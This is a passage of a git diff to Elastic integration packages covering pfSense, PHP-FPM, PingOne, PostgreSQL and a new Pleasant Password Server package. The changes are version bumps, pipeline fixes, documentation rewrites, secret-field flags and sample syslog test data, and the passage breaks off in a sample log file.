/bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log diff --git a/packages/pfsense/changelog.yml b/packages/pfsense/changelog.yml index 6d3dfc84b8a..0bd6c9f95e6 100644 --- a/packages/pfsense/changelog.yml +++ b/packages/pfsense/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.19.1" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9575 +- version: "1.19.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: 1.18.0 changes: - description: ECS version updated to 8.11.0. diff --git a/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 8590debe9f3..dc08f7c5d8c 100644 --- a/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -36,7 +36,8 @@ processors: SYSLOG_TIMESTAMP_FORMAT: '%{TIMESTAMP_ISO8601:_tmp.timestamp8601}%{SPACE}%{OBSERVER}%{SPACE}%{PROCESS}%{SPACE}(%{POSINT:process.pid:long}|-) - (-|%{META})' TIMESTAMP_ISO8601: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE:event.timezone}?' OBSERVER: '(?:%{IP:observer.ip}|%{HOSTNAME:observer.name})' - PROCESS: '(\(%{DATA:process.name}\)|(?:%{UNIXPATH}*/)?%{BASEPATH:process.name})' + UNIXPATH: '(/([\w_%!$@:.,+~-]+|\\.)*)*' + PROCESS: '(\(%{DATA:process.name}\)|(?:%{UNIXPATH})%{BASEPATH:process.name})' BASEPATH: '[[[:alnum:]]_%!$@:.,+~-]+' META: '\[[^\]]*\]' - date: diff --git a/packages/pfsense/manifest.yml b/packages/pfsense/manifest.yml index 9f3971badbd..3852759b2ad 100644 --- a/packages/pfsense/manifest.yml +++ b/packages/pfsense/manifest.yml @@ -1,6 +1,6 @@ name: pfsense title: pfSense -version: "1.18.0" +version: "1.19.1" description: Collect logs from pfSense and OPNsense with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: pfsense size: 512x143 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - network - security diff --git a/packages/php_fpm/_dev/build/docs/README.md b/packages/php_fpm/_dev/build/docs/README.md index 8596a592dac..c56e41f9441 100644 --- a/packages/php_fpm/_dev/build/docs/README.md +++ b/packages/php_fpm/_dev/build/docs/README.md @@ -4,14 +4,24 @@ PHP-FPM (FastCGI Process Manager) is a web tool used to speed up the performance of a website. It is much faster than traditional CGI based methods and has the ability to handle tremendous loads simultaneously. +Use the PHP-FPM integration to: + +- Collect metrics related to the pool and process. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + ## Data streams The PHP-FPM integration collects metrics data. -Metrics give you insight into the statistics of the PHP-FPM. Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. +Metrics provide insight into the statistics of the PHP-FPM. The Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. + +Data streams: +- `pool`: Collects information related to the connection handling, queue metrics, process manager configuration, process activity and performance indicators. +- `process`: Collects information related to the request metrics, the latest CPU and memory usage and the current running state. Note: -- Users can monitor and see the metrics inside the ingested documents for PHP-FPM in the logs-* index pattern from `Discover`. +- Users can monitor and view the metrics inside the ingested documents for PHP-FPM in the `logs-*` index pattern in `Discover`. ## Compatibility @@ -29,107 +39,25 @@ Example host configuration: `http://localhost:8080` Status path configuration format: `/path` -Example Status path configuration: `/status` - -### Troubleshooting - -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Pool`` and ``Process`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> PHP-FPM -> Integration policies` open the configuration of PHP-FPM and disable the `Collect PHP-FPM metrics` toggle to reindex metrics data stream and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-php_fpm.pool-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-php_fpm.pool-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-php_fpm.pool -``` -3. Go to `Integrations -> PHP-FPM -> Settings` and click on `Reinstall PHP-FPM`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-php_fpm.pool-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> PHP-FPM -> Integration policies` and open configuration of integration and enable the `Collect PHP-FPM metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +Example Status path configuration: `/status` + +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After successfully configuring the integration, click on the *Assets* tab of the PHP-FPM integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting + +If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the ``Pool`` and ``Process`` data streams. ## Metrics reference ### Pool -This is the `pool` data stream. `pool` data stream collects metrics related to the setup and contents of the FPM status page. +The `pool` data stream collects metrics related to the setup and contents of the FPM status page. {{event "pool"}} @@ -137,7 +65,7 @@ This is the `pool` data stream. `pool` data stream collects metrics related to t ### Process -This is the `process` data stream. `process` data stream collects metrics like request duration, content length, process state, etc. +The `process` data stream collects metrics related to the request duration, content length, process state, etc. {{event "process"}} diff --git a/packages/php_fpm/changelog.yml b/packages/php_fpm/changelog.yml index f2ddab2cbbd..51ac1e44a79 100644 --- a/packages/php_fpm/changelog.yml +++ b/packages/php_fpm/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Update README to follow documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9069 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/php_fpm/docs/README.md b/packages/php_fpm/docs/README.md index 9a891af8f14..412d09938fd 100644 --- a/packages/php_fpm/docs/README.md +++ b/packages/php_fpm/docs/README.md @@ -4,14 +4,24 @@ PHP-FPM (FastCGI Process Manager) is a web tool used to speed up the performance of a website. It is much faster than traditional CGI based methods and has the ability to handle tremendous loads simultaneously. +Use the PHP-FPM integration to: + +- Collect metrics related to the pool and process. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + ## Data streams The PHP-FPM integration collects metrics data. -Metrics give you insight into the statistics of the PHP-FPM. Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. +Metrics provide insight into the statistics of the PHP-FPM. The Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. + +Data streams: +- `pool`: Collects information related to the connection handling, queue metrics, process manager configuration, process activity and performance indicators. +- `process`: Collects information related to the request metrics, the latest CPU and memory usage and the current running state. Note: -- Users can monitor and see the metrics inside the ingested documents for PHP-FPM in the logs-* index pattern from `Discover`. +- Users can monitor and view the metrics inside the ingested documents for PHP-FPM in the `logs-*` index pattern in `Discover`. ## Compatibility @@ -29,107 +39,25 @@ Example host configuration: `http://localhost:8080` Status path configuration format: `/path` -Example Status path configuration: `/status` - -### Troubleshooting +Example Status path configuration: `/status` -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Pool`` and ``Process`` data stream's indices. -To reindex the data, the following steps must be performed. +## Setup -1. Stop the data stream by going to `Integrations -> PHP-FPM -> Integration policies` open the configuration of PHP-FPM and disable the `Collect PHP-FPM metrics` toggle to reindex metrics data stream and save the integration. +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. +## Validation -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-php_fpm.pool-default" - }, - "dest": { - "index": "temp_index" - } -} -``` +After successfully configuring the integration, click on the *Assets* tab of the PHP-FPM integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-php_fpm.pool-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-php_fpm.pool -``` -3. Go to `Integrations -> PHP-FPM -> Settings` and click on `Reinstall PHP-FPM`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-php_fpm.pool-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> PHP-FPM -> Integration policies` and open configuration of integration and enable the `Collect PHP-FPM metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` +## Troubleshooting -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the ``Pool`` and ``Process`` data streams. ## Metrics reference ### Pool -This is the `pool` data stream. `pool` data stream collects metrics related to the setup and contents of the FPM status page. +The `pool` data stream collects metrics related to the setup and contents of the FPM status page. An example event for `pool` looks as following: @@ -255,7 +183,7 @@ An example event for `pool` looks as following: ### Process -This is the `process` data stream. `process` data stream collects metrics like request duration, content length, process state, etc. +The `process` data stream collects metrics related to the request duration, content length, process state, etc. An example event for `process` looks as following: diff --git a/packages/php_fpm/manifest.yml b/packages/php_fpm/manifest.yml index 485893cb3fa..d21e6eb5fe0 100644 --- a/packages/php_fpm/manifest.yml +++ b/packages/php_fpm/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: php_fpm title: PHP-FPM -version: "1.2.0" +version: "1.2.1" description: This Elastic integration collects metrics from PHP-FPM. type: integration categories: diff --git a/packages/ping_one/changelog.yml b/packages/ping_one/changelog.yml index 4290a941d15..498b32cb86f 100644 --- a/packages/ping_one/changelog.yml +++ b/packages/ping_one/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.14.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.13.2" + changes: + - description: Fix ingest pipeline conditional field handling. + type: bugfix + link: https://github.com/elastic/integrations/pull/9076 - version: "1.13.1" changes: - description: Changed owners diff --git a/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 26f69500c9d..c10a35aa0c6 100644 --- a/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -21,51 +21,57 @@ processors: value: [iam] - append: field: event.category - if: ctx.json?.action?.type?.toLowerCase().contains('created') || ctx.json.action.type.toLowerCase().contains('deleted') || ctx.json.action.type.toLowerCase().contains('updated') || ctx.json.action.type.toLowerCase().contains('access_allowed') + if: >- + ctx.json?.action?.type != null && ( + ctx.json.action.type.toLowerCase().contains('created') || + ctx.json.action.type.toLowerCase().contains('deleted') || + ctx.json.action.type.toLowerCase().contains('updated') || + ctx.json.action.type.toLowerCase().contains('access_allowed') + ) value: [configuration] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('created') + if: ctx.json?.action?.type?.toLowerCase()?.contains('created') == true value: [creation] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('deleted') + if: ctx.json?.action?.type?.toLowerCase()?.contains('deleted') == true value: [deletion] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('updated') + if: ctx.json?.action?.type?.toLowerCase()?.contains('updated') == true value: [change] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('user') + if: ctx.json?.action?.type?.toLowerCase()?.contains('user') == true value: [user] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('group') + if: ctx.json?.action?.type?.toLowerCase()?.contains('group') == true value: [group] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('allowed') + if: ctx.json?.action?.type?.toLowerCase()?.contains('allowed') == true value: [info] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('denied') + if: ctx.json?.action?.type?.toLowerCase()?.contains('denied') == true value: [denied] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('started') + if: ctx.json?.action?.type?.toLowerCase()?.contains('started') == true value: [start] - append: field: event.type - if: ctx.json?.action?.type?.toLowerCase().contains('access_allowed') + if: ctx.json?.action?.type?.toLowerCase()?.contains('access_allowed') == true value: [access] - append: field: event.category - if: ctx.json?.action?.type?.toLowerCase().contains('password.check_succeeded') + if: ctx.json?.action?.type?.toLowerCase()?.contains('password.check_succeeded') == true value: [authentication] - append: field: event.category - if: ctx.json?.action?.type?.toLowerCase().contains('email') + if: ctx.json?.action?.type?.toLowerCase()?.contains('email') == true value: [email] - set: field: event.type diff --git a/packages/ping_one/manifest.yml b/packages/ping_one/manifest.yml index 81e8a60371d..a6b0682e161 100644 --- a/packages/ping_one/manifest.yml +++ b/packages/ping_one/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: ping_one title: PingOne -version: "1.13.1" +version: "1.14.0" description: Collect logs from PingOne with Elastic-Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - iam conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/ping-one-dashboard.png title: PingOne Audit Dashboard Screenshot @@ -72,12 +72,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true - type: httpjson title: Collect PingOne logs via API description: Collecting PingOne logs via API. @@ -92,6 +94,7 @@ policy_templates: title: Token URL description: Token URL of the PingOne App. required: true + secret: false - name: environment_id type: text title: Environment ID @@ -107,6 +110,7 @@ policy_templates: title: Client Secret description: Client Secret. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/postgresql/changelog.yml b/packages/postgresql/changelog.yml index cf2f8782017..41d7330be15 100644 --- a/packages/postgresql/changelog.yml +++ b/packages/postgresql/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.18.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.18.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.17.2" changes: - description: Improve wording on milliseconds. diff --git a/packages/postgresql/manifest.yml b/packages/postgresql/manifest.yml index 12b13bd2cbe..a5631260bf7 100644 --- a/packages/postgresql/manifest.yml +++ b/packages/postgresql/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: postgresql title: PostgreSQL -version: "1.17.2" +version: "1.19.0" description: Collect logs and metrics from PostgreSQL servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -56,6 +56,7 @@ policy_templates: - name: password type: password title: Password + secret: true owner: github: elastic/obs-infraobs-integrations type: elastic diff --git a/packages/pps/LICENSE.txt b/packages/pps/LICENSE.txt new file mode 100644 index 00000000000..d6456956733 --- /dev/null +++ b/packages/pps/LICENSE.txt @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/packages/pps/_dev/build/build.yml b/packages/pps/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/pps/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/pps/_dev/build/docs/README.md b/packages/pps/_dev/build/docs/README.md new file mode 100644 index 00000000000..40fc7b71ac8 --- /dev/null +++ b/packages/pps/_dev/build/docs/README.md @@ -0,0 +1,44 @@ +# Pleasant Password Server + +The Pleasant Password Server integration collects and parses DNS, DHCP, and Audit data collected from [Pleasant Password Server](https://pleasantpasswords.com/) via TCP/UDP or logfile. + +## Setup steps +1. Enable the integration with TCP/UDP input. +2. Log in to the PPS WebUI. +3. Configure the PPS to send messages to a Syslog server using the following steps. + 1. From the Menu go to Logging -> Syslog Configuration + 2. Set the Syslog Configuration to Enabled + 3. Set Hostname to the Hostname of your Fleet Agent or Load Balancer + 4. Set the Correct Port used in the Integration Configuration + 5. Set UDP or TCP + 6. Optionally set the Facility + +## Compatibility + +This module has been tested against `Pleasant Password Server Version 7.11.44.0 `. +It should however work with all versions. + +## Log samples +Below are the samples logs of the respective category: + +## Audit Logs: +``` +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Session Log On - User logged on 127.0.0.1 23/01 12:37:37.346 +<134>Jan 23 12:38:07 SRV-PPS-001 Pleasant Password Server:192.168.1.1 - user@name.test - - Success - Entry Updated - User updated entry changing the password 127.0.0.1 23/01 12:38:07.629 +<134>Jan 23 13:43:47 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Identity Verified - User verified via ApplicationBasicOAuth 127.0.0.1 23/01 13:43:47.422 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Identity Not Verified - User failed to verify themselves 127.0.0.1 23/01 13:47:25.593 +<134>Jan 23 13:47:25 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Error - Sign-in Failed - User sign-in denied 127.0.0.1 23/01 13:47:25.641 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Created - User created entry as a duplicate 127.0.0.1 23/01 14:05:54.404 +<134>Jan 23 14:05:54 SRV-PPS-001 Pleasant Password Server:192.168.1.3 - user@name.test - - Success - Entry Duplicated - User duplicated entry 127.0.0.1 23/01 14:05:54.450 +``` + +## Logs + +This is the `log` dataset. + +{{event "log"}} + +{{fields "log"}} diff --git a/packages/pps/_dev/deploy/docker/docker-compose.yml b/packages/pps/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..2fe2cada4f9 --- /dev/null +++ b/packages/pps/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,18 @@ +version: '2.3' +services: + pps-log-logfile: + image: alpine + volumes: + - ./sample_logs:/sample_logs:ro + - ${SERVICE_LOGS_DIR}:/var/log + command: /bin/sh -c "cp /sample_logs/* /var/log/" + pps-log-tcp: + image: docker.elastic.co/observability/stream:v0.15.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9037 -p=tcp /sample_logs/log.log + pps-log-udp: + image: docker.elastic.co/observability/stream:v0.15.0 + volumes: + - ./sample_logs:/sample_logs:ro + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9038 -p=udp /sample_logs/log.log diff --git a/packages/pps/_dev/deploy/docker/sample_logs/log.log b/packages/pps/_dev/deploy/docker/sample_logs/log.log new file mode 100644 index 00000000000..1be8b1a3a2a --- /dev/null +++ b/packages/pps/_dev/deploy/docker/sample_logs/log.log @@ -0,0 +1,10 @@ +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant 